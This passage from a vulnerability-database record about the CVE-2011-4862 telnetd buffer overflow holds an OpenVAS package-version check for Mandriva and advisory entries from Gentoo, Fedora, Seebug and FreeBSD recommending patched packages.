script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1)\");\n script_tag(name:\"affected\", value:\"krb5-appl on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"A 
vulnerability has been discovered and corrected in krb5-appl,\n heimdal and netkit-telnet:\n\n An unauthenticated remote attacker can cause a buffer overflow and\n probably execute arbitrary code with the privileges of the telnet\n daemon (CVE-2011-4862).\n\n In Mandriva the telnetd daemon from the netkit-telnet-server package\n does not have an initscript to start and stop the service, however\n one could rather easily craft an initscript or start the service by\n other means rendering the system vulnerable to this issue.\n\n The updated packages have been patched to correct this issue.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"heimdal-daemons\", rpm:\"heimdal-daemons~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-devel\", rpm:\"heimdal-devel~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-devel-doc\", rpm:\"heimdal-devel-doc~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-ftp\", rpm:\"heimdal-ftp~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-ftpd\", rpm:\"heimdal-ftpd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-libs\", rpm:\"heimdal-libs~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"heimdal-login\", rpm:\"heimdal-login~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-rsh\", rpm:\"heimdal-rsh~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-rshd\", rpm:\"heimdal-rshd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-server\", rpm:\"heimdal-server~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-telnet\", rpm:\"heimdal-telnet~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-telnetd\", rpm:\"heimdal-telnetd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-workstation\", rpm:\"heimdal-workstation~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"netkit-telnet\", rpm:\"netkit-telnet~0.17~4.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"netkit-telnet-server\", rpm:\"netkit-telnet-server~0.17~4.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal\", rpm:\"heimdal~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "edition": 1, "description": "### Background\n\nHeimdal is a free implementation of Kerberos 5.\n\n### Description\n\nA boundary error in the \"encrypt_keyid()\" function in appl/telnet/libtelnet/encrypt.c of the telnet daemon and client could cause a buffer overflow. \n\n### Impact\n\nAn unauthenticated remote attacker may be able to execute arbitrary code with the privileges of the user running the telnet daemon or client, or cause Denial of Service. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Heimdal users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-crypt/heimdal-1.5.1-r1\"", "modified": "2012-02-22T00:00:00", "published": "2012-02-22T00:00:00", "id": "GLSA-201202-05", "href": "https://security.gentoo.org/glsa/201202-05", "type": "gentoo", "title": "Heimdal: Arbitrary code execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "This package contains Kerberos-aware versions of the telnet, ftp, rcp, rsh, and rlogin clients and servers. While these have been replaced by tools such as OpenSSH in most environments, they remain in use in others. ", "modified": "2012-01-05T21:03:02", "published": "2012-01-05T21:03:02", "id": "FEDORA:836D520F9D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: krb5-appl-1.0.2-2.fc16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1526", "CVE-2011-4862"], "description": "This package contains Kerberos-aware versions of the telnet, ftp, rcp, rsh, and rlogin clients and servers. While these have been replaced by tools such as OpenSSH in most environments, they remain in use in others. 
", "modified": "2012-01-05T20:57:26", "published": "2012-01-05T20:57:26", "id": "FEDORA:684542130B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: krb5-appl-1.0.1-8.fc15", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:56:20", "description": "Bugtraq ID: 51182\r\nCVE ID\uff1aCVE-2011-4862\r\n\r\nFreeBSD\u662f\u4e00\u6b3e\u57fa\u4e8eBSD\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nFreeBSD Telnet\u534f\u8bae\u6709\u4e00\u4e2a\u5bf9\u6570\u636e\u6d41\u8fdb\u884c\u52a0\u5bc6\u7684\u673a\u5236(\u4f46\u5176\u52a0\u5bc6\u6027\u4e0d\u5f3a\uff0c\u4e0d\u80fd\u5728\u4efb\u4f55\u5173\u952e\u6027\u5b89\u5168\u5e94\u7528\u4e0a\u4f7f\u7528)\r\n\r\n\u5f53\u901a\u8fc7TELNET\u534f\u8bae\u63d0\u4f9b\u52a0\u5bc6\u5bc6\u94a5\u65f6\uff0c\u5728\u62f7\u8d1d\u5bc6\u94a5\u5230\u56fa\u5b9a\u7f13\u51b2\u533a\u65f6\u6ca1\u6709\u5bf9\u5176\u957f\u5ea6\u8fdb\u884c\u6821\u9a8c\uff0c\u53ef\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\u80fd\u8fde\u63a5telnetd\u5b88\u62a4\u7a0b\u5e8f\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u4ee5\u5b88\u62a4\u8fdb\u7a0b\u4e0a\u4e0b\u6587\u6267\u884c\u4efb\u610f\u4ee3\u7801\n0\nFreebsd 9.0-STABLE\r\nFreebsd 9.0-RELEASE\r\nFreebsd 9.0-RC3\r\nFreebsd 9.0-RC1\r\nFreebsd 8.2-STABLE\r\nFreebsd 8.2-STABLE\r\nFreebsd 8.2-RELEASE-p2\r\nFreebsd 8.2-RELEASE-p1\r\nFreebsd 8.2 - RELEASE -p3\r\nFreebsd 8.2\r\nFreebsd 8.1-RELEASE-p5\r\nFreebsd 8.1-RELEASE-p4\r\nFreeBSD 8.1-RELEASE\r\nFreeBSD 8.1-PRERELEASE\r\nFreebsd 8.1\r\nFreebsd 7.4-STABLE\r\nFreebsd 7.4-RELEASE-p2\r\nFreebsd 7.4 -RELEASE-p3\r\nFreebsd 7.4\r\nFreeBSD 7.3-STABLE\r\nFreebsd 7.3-RELEASE-p6\r\nFreeBSD 7.3-RELEASE-p1\r\nFreebsd 7.3 - RELEASE - p7\r\nFreebsd 7.3\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n----\r\nfreebsd\r\n\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u4f9b\u5e94\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\uff1a\r\nhttp://security.freebsd.org/advisories/FreeBSD-SA-11:08.telnetd.asc", "published": 
"2011-12-26T00:00:00", "type": "seebug", "title": "FreeBSD 'telnetd'\u5b88\u62a4\u8fdb\u7a0b\u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2011-12-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26112", "id": "SSV:26112", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:54", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "\nThe MIT Kerberos Team reports:\n\nWhen an encryption key is supplied via the TELNET protocol,\n\t its length is not validated before the key is copied into a\n\t fixed-size buffer. Also see MITKRB5-SA-2011-008.\n\n", "edition": 4, "modified": "2012-01-29T00:00:00", "published": "2011-12-23T00:00:00", "id": "4DDC78DC-300A-11E1-A2AA-0016CE01E285", "href": "https://vuxml.freebsd.org/freebsd/4ddc78dc-300a-11e1-a2aa-0016ce01e285.html", "title": "krb5-appl -- telnetd code execution vulnerability", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}